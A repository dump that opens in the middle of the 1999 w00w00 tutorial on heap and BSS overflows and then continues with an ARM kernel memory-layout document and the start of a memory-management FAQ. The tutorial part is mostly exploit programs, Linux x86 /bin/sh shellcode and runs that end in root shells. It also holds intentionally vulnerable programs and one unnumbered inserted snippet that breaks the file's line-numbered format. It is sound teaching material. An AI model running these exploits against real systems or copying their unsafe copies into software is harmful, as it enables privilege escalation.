of 'return esp;' in C */ 363 | } 364 | 365 | int main(int argc, char **argv) 366 | { 367 | u_long addr; 368 | 369 | register int i; 370 | int mainbufsize; 371 | 372 | char *mainbuf, buf[DIFF+6+1] = "+ +\t# "; 373 | 374 | /* ------------------------------------------------------ */ 375 | if (argc <= 1) 376 | { 377 | fprintf(stderr, "Usage: %s [try 310-330]\n", argv[0]); 378 | exit(ERROR); 379 | } 380 | /* ------------------------------------------------------ */ 381 | 382 | memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +\t# "); 383 | 384 | memset(buf + strlen(buf), 'A', DIFF); 385 | addr = getesp() + atoi(argv[1]); 386 | 387 | /* reverse byte order (on a little endian system) */ 388 | for (i = 0; i < sizeof(u_long); i++) 389 | buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255); 390 | 391 | mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULFILE) + 13; 392 | 393 | mainbuf = (char *)malloc(mainbufsize); 394 | memset(mainbuf, 0, sizeof(mainbufsize)); 395 | 396 | snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n", 397 | buf, VULPROG, VULFILE); 398 | 399 | printf("Overflowing tmpaddr to point to %p, check %s after.\n\n", 400 | addr, VULFILE); 401 | 402 | system(mainbuf); 403 | return 0; 404 | } 405 | 406 | ----------------------------------------------------------------------------- 407 | 408 | Here's what happens when we run it: 409 | [root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 320 410 | Overflowing tmpaddr to point to 0xbffffd60, check /root/.rhosts after. 411 | 412 | before: tmpfile = /tmp/vulprog.tmp 413 | Enter one line of data to put in /tmp/vulprog.tmp: 414 | after: tmpfile = /vulprog1 415 | 416 | Well, we can see that's part of argv[0] ("./vulprog1"), so we know we are 417 | close: 418 | [root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 330 419 | Overflowing tmpaddr to point to 0xbffffd6a, check /root/.rhosts after. 420 | 421 | before: tmpfile = /tmp/vulprog.tmp 422 | Enter one line of data to put in /tmp/vulprog.tmp: 423 | after: tmpfile = /root/.rhosts 424 | [root /tmp/heap/examples/advanced/vul-pkg1]# 425 | 426 | Got it! The exploit overwrites the buffer that the vulnerable program 427 | uses for gets() input. At the end of its buffer, it places the address 428 | of where we assume argv[1] of the vulnerable program is. That is, we 429 | overwrite everything between the overflowed buffer and the tmpfile 430 | pointer. We ascertained the tmpfile pointer's location in memory by 431 | sending arbitrary lengths of "A"'s until we discovered how many "A"'s it 432 | took to reach the start of tmpfile's address. Also, if you have 433 | source to the vulnerable program, you can also add a "printf()" to print 434 | out the addresses/offsets between the overflowed data and the target data 435 | (i.e., 'printf("%p - %p = 0x%lx bytes\n", buf2, buf1, (u_long)diff)'). 436 | 437 | (Un)fortunately, the offsets usually change at compile-time (as far as 438 | I know), but we can easily recalculate, guess, or "brute force" the 439 | offsets. 440 | 441 | Note: 442 | Now that we need a valid address (argv[1]'s address), we must reverse 443 | the byte order for little endian systems. Little endian systems use 444 | the least significant byte first (x86 is little endian) so that 445 | 0x12345678 is 0x78563412 in memory. If we were doing this on a big 446 | endian system (such as a sparc) we could drop out the code to reverse 447 | the byte order. On a big endian system (like sparc), we could leave 448 | the addresses alone. 
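To spell out the byte-order handling, here is the address-packing loop
used by the exploits above, pulled out into a tiny stand-alone program
(an illustrative sketch, not part of the exploit code itself):
-----------------------------------------------------------------------------
/* pack_addr.c -- shows how the exploits serialize an address into a
 * buffer one byte at a time, least significant byte first (the
 * in-memory byte order on little endian x86). */

#include <stdio.h>
#include <sys/types.h>

void put_addr_le(char *dest, u_long addr)
{
   int i;

   for (i = 0; i < sizeof(u_long); i++)
      dest[i] = (addr >> (i * 8)) & 255;
}

int main(void)
{
   char buf[sizeof(u_long)];
   int i;

   put_addr_le(buf, 0x12345678);

   for (i = 0; i < sizeof(u_long); i++)
      printf("%02x ", (unsigned char)buf[i]);
   putchar('\n');   /* on a 32-bit little endian system: 78 56 34 12 */

   return 0;
}
-----------------------------------------------------------------------------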
449 | 450 | Further note: 451 | So far none of these examples required an executable heap! As I 452 | briefly mentioned in the "Why Heap/BSS Overflows are Significant" 453 | section, these (with the exception of the address byte order) previous 454 | examples were all system/architecture independent. This is useful in 455 | exploiting heap-based overflows. 456 | 457 | With knowledge of how to overwrite pointers, we're going to show how to 458 | modify function pointers. The downside to exploiting function pointers 459 | (and the others to follow) is that they require an executable heap. 460 | 461 | A function pointer (i.e., "int (*funcptr)(char *str)") allows a 462 | programmer to dynamically modify a function to be called. We can 463 | overwrite a function pointer by overwriting its address, so that when 464 | it's executed, it calls the function we point it to instead. This is 465 | good news because there are several options we have. First, we 466 | can include our own shellcode. We can do one of the following with 467 | shellcode: 468 | 469 | 1. argv[] method: store the shellcode in an argument to the program 470 | (requiring an executable stack) 471 | 472 | 2. heap offset method: offset from the top of the heap to the 473 | estimated address of the target/overflow buffer (requiring an 474 | executable heap) 475 | 476 | Note: There is a greater probability of the heap being executable than 477 | the stack on any given system. Therefore, the heap method will probably 478 | work more often. 479 | 480 | A second method is to simply guess (though it's inefficient) the address 481 | of a function, using an estimated offset of that in the vulnerable 482 | program. Also, if we know the address of system() in our program, it 483 | will be at a very close offset, assuming both vulprog/exploit were 484 | compiled the same way. The advantage is that no executable is required. 485 | 486 | Note: 487 | Another method is to use the PLT (Procedure Linking Table) which shares 488 | the address of a function in the PLT. I first learned the PLT method 489 | from str (stranJer) in a non-executable stack exploit for sparc. 490 | 491 | The reason the second method is the preferred method, is simplicity. 492 | We can guess the offset of system() in the vulprog from the address of 493 | system() in our exploit fairly quickly. This is synonymous on remote 494 | systems (assuming similar versions, operating systems, and 495 | architectures). With the stack method, the advantage is that we can do 496 | whatever we want, and we don't require compatible function pointers 497 | (i.e., char (*funcptr)(int a) and void (*funcptr)() would work the same). 498 | The disadvantage (as mentioned earlier) is that it requires an 499 | executable stack. 500 | 501 | Here is our vulnerable program for the following 2 exploits: 502 | ----------------------------------------------------------------------------- 503 | /* 504 | * Just the vulnerable program we will exploit. 
505 | * Compile as: gcc -o vulprog vulprog.c (or change exploit macros) 506 | */ 507 | 508 | #include 509 | #include 510 | #include 511 | #include 512 | 513 | #define ERROR -1 514 | #define BUFSIZE 64 515 | 516 | int goodfunc(const char *str); /* funcptr starts out as this */ 517 | 518 | int main(int argc, char **argv) 519 | { 520 | static char buf[BUFSIZE]; 521 | static int (*funcptr)(const char *str); 522 | 523 | if (argc <= 2) 524 | { 525 | fprintf(stderr, "Usage: %s \n", argv[0]); 526 | exit(ERROR); 527 | } 528 | 529 | printf("(for 1st exploit) system() = %p\n", system); 530 | printf("(for 2nd exploit, stack method) argv[2] = %p\n", argv[2]); 531 | printf("(for 2nd exploit, heap offset method) buf = %p\n\n", buf); 532 | 533 | funcptr = (int (*)(const char *str))goodfunc; 534 | printf("before overflow: funcptr points to %p\n", funcptr); 535 | 536 | memset(buf, 0, sizeof(buf)); 537 | strncpy(buf, argv[1], strlen(argv[1])); 538 | printf("after overflow: funcptr points to %p\n", funcptr); 539 | 540 | (void)(*funcptr)(argv[2]); 541 | return 0; 542 | } 543 | 544 | /* ---------------------------------------------- */ 545 | 546 | /* This is what funcptr would point to if we didn't overflow it */ 547 | int goodfunc(const char *str) 548 | { 549 | printf("\nHi, I'm a good function. I was passed: %s\n", str); 550 | return 0; 551 | } 552 | ----------------------------------------------------------------------------- 553 | 554 | Our first example, is the system() method: 555 | ----------------------------------------------------------------------------- 556 | /* 557 | * Copyright (C) January 1999, Matt Conover & WSD 558 | * 559 | * Demonstrates overflowing/manipulating static function pointers in 560 | * the bss (uninitialized data) to execute functions. 561 | * 562 | * Try in the offset (argv[2]) in the range of 0-20 (10-16 is best) 563 | * To compile use: gcc -o exploit1 exploit1.c 564 | */ 565 | 566 | #include 567 | #include 568 | #include 569 | #include 570 | 571 | #define BUFSIZE 64 /* the estimated diff between funcptr/buf */ 572 | 573 | #define VULPROG "./vulprog" /* vulnerable program location */ 574 | #define CMD "/bin/sh" /* command to execute if successful */ 575 | 576 | #define ERROR -1 577 | 578 | int main(int argc, char **argv) 579 | { 580 | register int i; 581 | u_long sysaddr; 582 | static char buf[BUFSIZE + sizeof(u_long) + 1] = {0}; 583 | 584 | if (argc <= 1) 585 | { 586 | fprintf(stderr, "Usage: %s \n", argv[0]); 587 | fprintf(stderr, "[offset = estimated system() offset]\n\n"); 588 | 589 | exit(ERROR); 590 | } 591 | 592 | sysaddr = (u_long)&system - atoi(argv[1]); 593 | printf("trying system() at 0x%lx\n", sysaddr); 594 | 595 | memset(buf, 'A', BUFSIZE); 596 | 597 | /* reverse byte order (on a little endian system) (ntohl equiv) */ 598 | for (i = 0; i < sizeof(sysaddr); i++) 599 | buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255; 600 | 601 | execl(VULPROG, VULPROG, buf, CMD, NULL); 602 | return 0; 603 | } 604 | ----------------------------------------------------------------------------- 605 | 606 | When we run this with an offset of 16 (which may vary) we get: 607 | [root /w00w00/heap/examples]# ./exploit1 16 608 | trying system() at 0x80484d0 609 | (for 1st exploit) system() = 0x80484d0 610 | (for 2nd exploit, stack method) argv[2] = 0xbffffd3c 611 | (for 2nd exploit, heap offset method) buf = 0x804a9a8 612 | 613 | before overflow: funcptr points to 0x8048770 614 | after overflow: funcptr points to 0x80484d0 615 | bash# 616 | 617 | And our second example, using both argv[] 
and heap offset method: 618 | ----------------------------------------------------------------------------- 619 | /* 620 | * Copyright (C) January 1999, Matt Conover & WSD 621 | * 622 | * This demonstrates how to exploit a static buffer to point the 623 | * function pointer at argv[] to execute shellcode. This requires 624 | * an executable heap to succeed. 625 | * 626 | * The exploit takes two argumenst (the offset and "heap"/"stack"). 627 | * For argv[] method, it's an estimated offset to argv[2] from 628 | * the stack top. For the heap offset method, it's an estimated offset 629 | * to the target/overflow buffer from the heap top. 630 | * 631 | * Try values somewhere between 325-345 for argv[] method, and 420-450 632 | * for heap. 633 | * 634 | * To compile use: gcc -o exploit2 exploit2.c 635 | */ 636 | 637 | #include 638 | #include 639 | #include 640 | #include 641 | 642 | #define ERROR -1 643 | #define BUFSIZE 64 /* estimated diff between buf/funcptr */ 644 | 645 | #define VULPROG "./vulprog" /* where the vulprog is */ 646 | 647 | char shellcode[] = /* just aleph1's old shellcode (linux x86) */ 648 | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0" 649 | "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8" 650 | "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; 651 | 652 | u_long getesp() 653 | { 654 | __asm__("movl %esp,%eax"); /* set sp as return value */ 655 | } 656 | 657 | int main(int argc, char **argv) 658 | { 659 | register int i; 660 | u_long sysaddr; 661 | char buf[BUFSIZE + sizeof(u_long) + 1]; 662 | 663 | if (argc <= 2) 664 | { 665 | fprintf(stderr, "Usage: %s \n", argv[0]); 666 | exit(ERROR); 667 | } 668 | 669 | if (strncmp(argv[2], "stack", 5) == 0) 670 | { 671 | printf("Using stack for shellcode (requires exec. stack)\n"); 672 | 673 | sysaddr = getesp() + atoi(argv[1]); 674 | printf("Using 0x%lx as our argv[1] address\n\n", sysaddr); 675 | 676 | memset(buf, 'A', BUFSIZE + sizeof(u_long)); 677 | } 678 | 679 | else 680 | { 681 | printf("Using heap buffer for shellcode " 682 | "(requires exec. heap)\n"); 683 | 684 | sysaddr = (u_long)sbrk(0) - atoi(argv[1]); 685 | printf("Using 0x%lx as our buffer's address\n\n", sysaddr); 686 | 687 | if (BUFSIZE + 4 + 1 < strlen(shellcode)) 688 | { 689 | fprintf(stderr, "error: buffer is too small for shellcode " 690 | "(min. = %d bytes)\n", strlen(shellcode)); 691 | 692 | exit(ERROR); 693 | } 694 | 695 | strcpy(buf, shellcode); 696 | memset(buf + strlen(shellcode), 'A', 697 | BUFSIZE - strlen(shellcode) + sizeof(u_long)); 698 | } 699 | 700 | buf[BUFSIZE + sizeof(u_long)] = '\0'; 701 | 702 | /* reverse byte order (on a little endian system) (ntohl equiv) */ 703 | for (i = 0; i < sizeof(sysaddr); i++) 704 | buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255; 705 | 706 | execl(VULPROG, VULPROG, buf, shellcode, NULL); 707 | return 0; 708 | } 709 | ----------------------------------------------------------------------------- 710 | 711 | When we run this with an offset of 334 for the argv[] method we get: 712 | [root /w00w00/heap/examples] ./exploit2 334 stack 713 | Using stack for shellcode (requires exec. 
stack) 714 | Using 0xbffffd16 as our argv[1] address 715 | 716 | (for 1st exploit) system() = 0x80484d0 717 | (for 2nd exploit, stack method) argv[2] = 0xbffffd16 718 | (for 2nd exploit, heap offset method) buf = 0x804a9a8 719 | 720 | before overflow: funcptr points to 0x8048770 721 | after overflow: funcptr points to 0xbffffd16 722 | bash# 723 | 724 | When we run this with an offset of 428-442 for the heap offset method we get: 725 | [root /w00w00/heap/examples] ./exploit2 428 heap 726 | Using heap buffer for shellcode (requires exec. heap) 727 | Using 0x804a9a8 as our buffer's address 728 | 729 | (for 1st exploit) system() = 0x80484d0 730 | (for 2nd exploit, stack method) argv[2] = 0xbffffd16 731 | (for 2nd exploit, heap offset method) buf = 0x804a9a8 732 | 733 | before overflow: funcptr points to 0x8048770 734 | after overflow: funcptr points to 0x804a9a8 735 | bash# 736 | 737 | Note: 738 | Another advantage to the heap method is that you have a large 739 | working range. With argv[] (stack) method, it needed to be exact. With 740 | the heap offset method, any offset between 428-442 worked. 741 | 742 | As you can see, there are several different methods to exploit the same 743 | problem. As an added bonus, we'll include a final type of exploitation 744 | that uses jmp_bufs (setjmp/longjmp). jmp_buf's basically store a stack 745 | frame, and jump to it at a later point in execution. If we get a chance 746 | to overflow a buffer between setjmp() and longjmp(), that's above the 747 | overflowed buffer, this can be exploited. We can set these up to emulate 748 | the behavior of a stack-based overflow (as does the argv[] shellcode 749 | method used earlier, also). Now this is the jmp_buf for an x86 system. 750 | These will needed to be modified for other architectures, accordingly. 751 | 752 | First we will include a vulnerable program again: 753 | ----------------------------------------------------------------------------- 754 | /* 755 | * This is just a basic vulnerable program to demonstrate 756 | * how to overwrite/modify jmp_buf's to modify the course of 757 | * execution. 
758 | */ 759 | 760 | #include 761 | #include 762 | #include 763 | #include 764 | #include 765 | 766 | #define ERROR -1 767 | #define BUFSIZE 16 768 | 769 | static char buf[BUFSIZE]; 770 | jmp_buf jmpbuf; 771 | 772 | u_long getesp() 773 | { 774 | __asm__("movl %esp,%eax"); /* the return value goes in %eax */ 775 | } 776 | 777 | int main(int argc, char **argv) 778 | { 779 | if (argc <= 1) 780 | { 781 | fprintf(stderr, "Usage: %s \n"); 782 | exit(ERROR); 783 | } 784 | 785 | printf("[vulprog] argv[2] = %p\n", argv[2]); 786 | printf("[vulprog] sp = 0x%lx\n\n", getesp()); 787 | 788 | if (setjmp(jmpbuf)) /* if > 0, we got here from longjmp() */ 789 | { 790 | fprintf(stderr, "error: exploit didn't work\n"); 791 | exit(ERROR); 792 | } 793 | 794 | printf("before:\n"); 795 | printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n", 796 | jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di); 797 | 798 | printf("bp = %p, sp = %p, pc = %p\n\n", 799 | jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc); 800 | 801 | strncpy(buf, argv[1], strlen(argv[1])); /* actual copy here */ 802 | 803 | printf("after:\n"); 804 | printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n", 805 | jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di); 806 | 807 | printf("bp = %p, sp = %p, pc = %p\n\n", 808 | jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc); 809 | 810 | longjmp(jmpbuf, 1); 811 | return 0; 812 | } 813 | ----------------------------------------------------------------------------- 814 | 815 | The reason we have the vulnerable program output its stack pointer (esp 816 | on x86) is that it makes "guessing" easier for the novice. 817 | 818 | And now the exploit for it (you should be able to follow it): 819 | ----------------------------------------------------------------------------- 820 | /* 821 | * Copyright (C) January 1999, Matt Conover & WSD 822 | * 823 | * Demonstrates a method of overwriting jmpbuf's (setjmp/longjmp) 824 | * to emulate a stack-based overflow in the heap. By that I mean, 825 | * you would overflow the sp/pc of the jmpbuf. When longjmp() is 826 | * called, it will execute the next instruction at that address. 827 | * Therefore, we can stick shellcode at this address (as the data/heap 828 | * section on most systems is executable), and it will be executed. 829 | * 830 | * This takes two arguments (offsets): 831 | * arg 1 - stack offset (should be about 25-45). 832 | * arg 2 - argv offset (should be about 310-330). 
833 | */ 834 | 835 | #include 836 | #include 837 | #include 838 | #include 839 | 840 | #define ERROR -1 841 | #define BUFSIZE 16 842 | 843 | #define VULPROG "./vulprog4" 844 | 845 | char shellcode[] = /* just aleph1's old shellcode (linux x86) */ 846 | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0" 847 | "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8" 848 | "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; 849 | 850 | u_long getesp() 851 | { 852 | __asm__("movl %esp,%eax"); /* the return value goes in %eax */ 853 | } 854 | 855 | int main(int argc, char **argv) 856 | { 857 | int stackaddr, argvaddr; 858 | register int index, i, j; 859 | 860 | char buf[BUFSIZE + 24 + 1]; 861 | 862 | if (argc <= 1) 863 | { 864 | fprintf(stderr, "Usage: %s \n", 865 | argv[0]); 866 | 867 | fprintf(stderr, "[stack offset = offset to stack of vulprog\n"); 868 | fprintf(stderr, "[argv offset = offset to argv[2]]\n"); 869 | 870 | exit(ERROR); 871 | } 872 | 873 | stackaddr = getesp() - atoi(argv[1]); 874 | argvaddr = getesp() + atoi(argv[2]); 875 | 876 | printf("trying address 0x%lx for argv[2]\n", argvaddr); 877 | printf("trying address 0x%lx for sp\n\n", stackaddr); 878 | 879 | /* 880 | * The second memset() is needed, because otherwise some values 881 | * will be (null) and the longjmp() won't do our shellcode. 882 | */ 883 | 884 | memset(buf, 'A', BUFSIZE), memset(buf + BUFSIZE + 4, 0x1, 12); 885 | buf[BUFSIZE+24] = '\0'; 886 | 887 | /* ------------------------------------- */ 888 | 889 | /* 890 | * We need the stack pointer, because to set pc to our shellcode 891 | * address, we have to overwrite the stack pointer for jmpbuf. 892 | * Therefore, we'll rewrite it with the real address again. 893 | */ 894 | 895 | /* reverse byte order (on a little endian system) (ntohl equiv) */ 896 | for (i = 0; i < sizeof(u_long); i++) /* setup BP */ 897 | { 898 | index = BUFSIZE + 16 + i; 899 | buf[index] = (stackaddr >> (i * 8)) & 255; 900 | } 901 | 902 | /* ----------------------------- */ 903 | 904 | /* reverse byte order (on a little endian system) (ntohl equiv) */ 905 | for (i = 0; i < sizeof(u_long); i++) /* setup SP */ 906 | { 907 | index = BUFSIZE + 20 + i; 908 | buf[index] = (stackaddr >> (i * 8)) & 255; 909 | } 910 | 911 | /* ----------------------------- */ 912 | 913 | /* reverse byte order (on a little endian system) (ntohl equiv) */ 914 | for (i = 0; i < sizeof(u_long); i++) /* setup PC */ 915 | { 916 | index = BUFSIZE + 24 + i; 917 | buf[index] = (argvaddr >> (i * 8)) & 255; 918 | } 919 | 920 | execl(VULPROG, VULPROG, buf, shellcode, NULL); 921 | return 0; 922 | } 923 | ----------------------------------------------------------------------------- 924 | 925 | Ouch, that was sloppy. But anyway, when we run this with a stack offset 926 | of 36 and a argv[2] offset of 322, we get the following: 927 | [root /w00w00/heap/examples/vulpkgs/vulpkg4]# ./exploit4 36 322 928 | trying address 0xbffffcf6 for argv[2] 929 | trying address 0xbffffb90 for sp 930 | 931 | [vulprog] argv[2] = 0xbffffcf6 932 | [vulprog] sp = 0xbffffb90 933 | 934 | before: 935 | bx = 0x0, si = 0x40001fb0, di = 0x4000000f 936 | bp = 0xbffffb98, sp = 0xbffffb94, pc = 0x8048715 937 | 938 | after: 939 | bx = 0x1010101, si = 0x1010101, di = 0x1010101 940 | bp = 0xbffffb90, sp = 0xbffffb90, pc = 0xbffffcf6 941 | 942 | bash# 943 | 944 | w00w00! For those of you that are saying, "Okay. I see this works in a 945 | controlled environment; but what about in the wild?" There is sensitive 946 | data on the heap that can be overflowed. 
Examples include:
947 | functions                              reason
948 | 1. *gets()/*printf(), *scanf()         __iob (FILE) structure in heap
949 | 2. popen()                             __iob (FILE) structure in heap
950 | 3. *dir() (readdir, seekdir, ...)      DIR entries (dir/heap buffers)
951 | 4. atexit()                            static/global function pointers
952 | 5. strdup()                            allocates dynamic data in the heap
953 | 6. getenv()                            stored data on heap
954 | 7. tmpnam()                            stored data on heap
955 | 8. malloc()                            chain pointers
956 | 9. rpc callback functions              function pointers
957 | 10. windows callback functions         function pointers kept on heap
958 | 11. signal handler pointers in         function pointers (note: unix tracks
959 |     cygnus (gcc for win)               these in the kernel, not in the heap)
960 | 
961 | Now, you can definitely see some uses for these functions. Room allocated
962 | for FILE structures in functions such as printf(), fgets(),
963 | readdir(), seekdir(), etc. can be manipulated (buffer or function
964 | pointers). atexit() has function pointers that will be called when the
965 | program terminates. strdup() can store strings (such as filenames or
966 | passwords) on the heap. malloc()'s own chain pointers (inside its pool)
967 | can be manipulated to access memory it wasn't meant to access. getenv()
968 | stores data on the heap, which would allow us to modify something such as
969 | $HOME after it's initially checked. svc/rpc registration functions
970 | (librpc, libnsl, etc.) keep callback functions stored on the heap.
971 | 
972 | Once you know how to overwrite FILE structures with popen(), you can
973 | quickly figure out how to do it with other functions (i.e., *printf,
974 | *gets, *scanf, etc.), as well as DIR structures (because they are
975 | similar).
976 | 
977 | Two "real world" vulnerabilities are Solaris' tip and BSDI's crontab.
978 | The BSDI crontab vulnerability was discovered by mudge of L0pht (see
979 | L0pht 1996 Advisory Page).
980 | 
981 | Our first case study will be the BSDI crontab heap-based overflow.
982 | Passing a long filename will overflow a static buffer. Above that buffer
983 | in memory, we have a pwd (see pwd.h) structure! This stores a user name,
984 | password, uid, gid, etc. By overwriting the uid/gid field of the pwd, we
985 | can modify the privileges that crond will run our crontab with (as soon as
986 | it tries to run our crontab). Our crontab script could then drop a suid
987 | root shell, because it will be running with uid/gid 0.
988 | 
989 | Our second case study is 'tip' on Solaris. It runs suid uucp. It is
990 | possible to get root once uucp privileges are gained (but, that's outside
991 | the scope of this article). Tip will overflow a static buffer when
992 | prompting for a file to send/receive. Above the static buffer in memory is
993 | a jmp_buf. By overwriting the static buffer and then causing a SIGINT,
994 | we can get shellcode executed (by storing it in argv[]). To exploit
995 | successfully, we need to either connect to a valid system, or create a
996 | "fake device" to which tip will connect.
997 | 
998 | Possible Fixes (Workarounds)
999 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1000 | Obviously, the best prevention for heap-based overflows is writing good
1001 | code! Similar to stack-based overflows, there is no real way of
1002 | preventing heap-based overflows.
1003 | 
1004 | We can get a copy of the bounds checking gcc/egcs (which should locate
1005 | most potential heap-based overflows) developed by Richard Jones and Paul
1006 | Kelly.
This program can be downloaded from Richard Jones' homepage
1007 | at http://www.annexia.demon.co.uk. It detects overruns that might be
1008 | missed by human error. One example they use is: "int array[10]; for (i =
1009 | 0; i <= 10; i++) array[i] = 1". I have never used it.
1010 | 
1011 | Note:
1012 | For Windows, one could use NuMega's BoundsChecker, which essentially
1013 | performs the same role as the bounds checking gcc.
1014 | 
1015 | We can always make a non-executable heap patch (as mentioned earlier, most
1016 | systems have an executable heap). During a conversation I had with Solar
1017 | Designer, he mentioned that the main problems with a non-executable heap
1018 | would involve compilers, interpreters, etc.
1019 | 
1020 | Note:
1021 | I added a note section here to reiterate the point that a non-executable
1022 | heap does NOT prevent heap overflows at all. It means we can't execute
1023 | instructions in the heap. It does NOT prevent us from overwriting data
1024 | in the heap.
1025 | 
1026 | Likewise, another possibility is to make a "HeapGuard", which would be
1027 | the equivalent of Cowan's StackGuard mentioned earlier. He (et al.)
1028 | also developed something called "MemGuard", but it's a misnomer.
1029 | Its function is to prevent a return address (on the stack) from being
1030 | overwritten (via canary values) on the stack. It does nothing to prevent
1031 | overflows in the heap or bss.
1032 | 
1033 | 
1034 | Acknowledgements
1035 | ~~~~~~~~~~~~~~~~
1036 | There has been a significant amount of work on heap-based overflows in
1037 | the past. We ought to name some other people who have published work
1038 | involving heap/bss-based overflows (though our work wasn't based on
1039 | theirs).
1040 | 
1041 | Solar Designer: SuperProbe exploit (function pointers), color_xterm
1042 | exploit (struct pointers), WebSite (pointer arrays), etc.
1043 | 
1044 | L0pht: Internet Explorer 4.01 vulnerability (dildog), BSDI crontab
1045 | exploit (mudge), etc.
1046 | 
1047 | Some others who have published exploits for heap-based overflows (thanks
1048 | to stranJer for pointing them out) are Joe Zbiciak (solaris ps) and Adam
1049 | Morrison (stdioflow). I'm sure there are many others, and I apologize for
1050 | excluding anyone.
1051 | 
1052 | I'd also like to thank the following people who had some direct
1053 | involvement in this article: str (stranJer), halflife, and jobe.
1054 | Indirect involvements: Solar Designer, mudge, and other w00w00
1055 | affiliates.
1056 | 
1057 | Other good sources of info include: as/gcc/ld info files (/usr/info/*),
1058 | BugTraq archives (http://www.geek-girl.com/bugtraq), w00w00
1059 | (http://www.w00w00.org), and L0pht (http://www.l0pht.com), etc.
1060 | --------------------------------------------------------------------------------
/memory.txt:
--------------------------------------------------------------------------------
1 | Kernel Memory Layout on ARM Linux
2 | 
3 | Russell King
4 | November 17, 2005 (2.6.15)
5 | 
6 | This document describes the virtual memory layout which the Linux
7 | kernel uses for ARM processors. It indicates which regions are
8 | free for platforms to use, and which are used by generic code.
9 | 
10 | The ARM CPU is capable of addressing a maximum of 4GB virtual memory
11 | space, and this must be shared between user space processes, the
12 | kernel, and hardware devices.
13 | 14 | As the ARM architecture matures, it becomes necessary to reserve 15 | certain regions of VM space for use for new facilities; therefore 16 | this document may reserve more VM space over time. 17 | 18 | Start End Use 19 | -------------------------------------------------------------------------- 20 | ffff8000 ffffffff copy_user_page / clear_user_page use. 21 | For SA11xx and Xscale, this is used to 22 | setup a minicache mapping. 23 | 24 | ffff1000 ffff7fff Reserved. 25 | Platforms must not use this address range. 26 | 27 | ffff0000 ffff0fff CPU vector page. 28 | The CPU vectors are mapped here if the 29 | CPU supports vector relocation (control 30 | register V bit.) 31 | 32 | ffc00000 fffeffff DMA memory mapping region. Memory returned 33 | by the dma_alloc_xxx functions will be 34 | dynamically mapped here. 35 | 36 | ff000000 ffbfffff Reserved for future expansion of DMA 37 | mapping region. 38 | 39 | VMALLOC_END feffffff Free for platform use, recommended. 40 | VMALLOC_END must be aligned to a 2MB 41 | boundary. 42 | 43 | VMALLOC_START VMALLOC_END-1 vmalloc() / ioremap() space. 44 | Memory returned by vmalloc/ioremap will 45 | be dynamically placed in this region. 46 | VMALLOC_START may be based upon the value 47 | of the high_memory variable. 48 | 49 | PAGE_OFFSET high_memory-1 Kernel direct-mapped RAM region. 50 | This maps the platforms RAM, and typically 51 | maps all platform RAM in a 1:1 relationship. 52 | 53 | TASK_SIZE PAGE_OFFSET-1 Kernel module space 54 | Kernel modules inserted via insmod are 55 | placed here using dynamic mappings. 56 | 57 | 00001000 TASK_SIZE-1 User space mappings 58 | Per-thread mappings are placed here via 59 | the mmap() system call. 60 | 61 | 00000000 00000fff CPU vector page / null pointer trap 62 | CPUs which do not support vector remapping 63 | place their vector page here. NULL pointer 64 | dereferences by both the kernel and user 65 | space are also caught via this mapping. 66 | 67 | Please note that mappings which collide with the above areas may result 68 | in a non-bootable kernel, or may cause the kernel to (eventually) panic 69 | at run time. 70 | 71 | Since future CPUs may impact the kernel mapping layout, user programs 72 | must not access any memory which is not mapped inside their 0x0001000 73 | to TASK_SIZE address range. If they wish to access these areas, they 74 | must set up their own mappings using open() and mmap(). 75 | -------------------------------------------------------------------------------- /memorylayout.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Malformation/Notes/73e7b03526bb37f5b484c0bc6cd03caab8d1eb20/memorylayout.txt -------------------------------------------------------------------------------- /memorymanagement.txt: -------------------------------------------------------------------------------- 1 | 2 | Memory Management Reference 3 | Frequently Asked Questions 4 | 5 | Contents | News | Glossary | FAQ | Articles | Bibliography | Links | 6 | Feedback 7 | _________________________________________________________________ 8 | 9 | This is a list of questions that represent the problems people often 10 | have with memory management. Some answers appear below, with links to 11 | helpful supporting material, such as the glossary, the bibliography, 12 | and external sites. For a full explanation of any terms used, see the 13 | glossary. 14 | 15 | C-specific questions 16 | 17 | + Can I use garbage collection in C? 
18 | + Why do I need to test the return value from malloc? Surely it 19 | always succeeds? 20 | + What's the point of having a garbage collector? Why not use 21 | malloc and free? 22 | + What's wrong with ANSI malloc in the C library? 23 | 24 | C++-specific questions 25 | 26 | + Can I use garbage collection in C++? 27 | + Why is delete so slow? 28 | + What happens if you use class libraries that leak memory? 29 | + Can't I get all the benefits of garbage collection using C++ 30 | constructors and destructors? 31 | 32 | Common objections to garbage collection 33 | 34 | + What languages use garbage collection? 35 | + What's the advantage of garbage collection? 36 | + Programs with GC are huge and bloated; GC isn't suitable for 37 | small programs or systems. 38 | + I can't use GC because I can't afford to have my program 39 | pause 40 | + Isn't it much cheaper to use reference counts rather than 41 | garbage collection? 42 | + Isn't garbage collection unreliable? I've heard that GCs 43 | often kill the program. 44 | + I've heard that GC uses twice as much memory. 45 | + Doesn't garbage collection make programs slow? 46 | + Manual memory management gives me control -- it doesn't 47 | pause. 48 | 49 | Miscellaneous 50 | 51 | + Why does my disk rattle so much? 52 | + Where can I find out more about garbage collection? 53 | + Where can I get a garbage collector? 54 | + Why does my program use so much memory? 55 | + I use a library, and my program grows every time I call it. 56 | Why? 57 | + Should I write my own memory 